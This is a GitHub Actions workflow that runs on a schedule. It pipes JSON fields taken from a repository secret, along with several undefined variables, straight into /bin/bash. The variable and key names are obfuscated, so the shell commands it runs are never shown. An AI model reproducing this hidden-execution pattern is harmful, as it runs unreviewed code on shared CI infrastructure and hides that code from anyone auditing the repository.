name: pojianshisi
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'

jobs:  # 17363
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pojianshisi
        env:
          stnln45: ${{ secrets.stnln45 }}
        run: |
          echo $stnln45 | jq -r .y224 | /bin/bash
          echo $qx20 | jq -r .eh01 | /bin/bash
          echo $k622 | jq -r .pdl2002 | /bin/bash
          echo $meqai0 | jq -r .v3 | /bin/bash
          echo $vwys94 | jq -r .kn97313 | /bin/bash
          echo $jh104 | jq -r .ypw8 | /bin/bash
          echo $tilj7 | jq -r .lj22546 | /bin/bash
          echo $sk0 | jq -r .nghg704 | /bin/bash

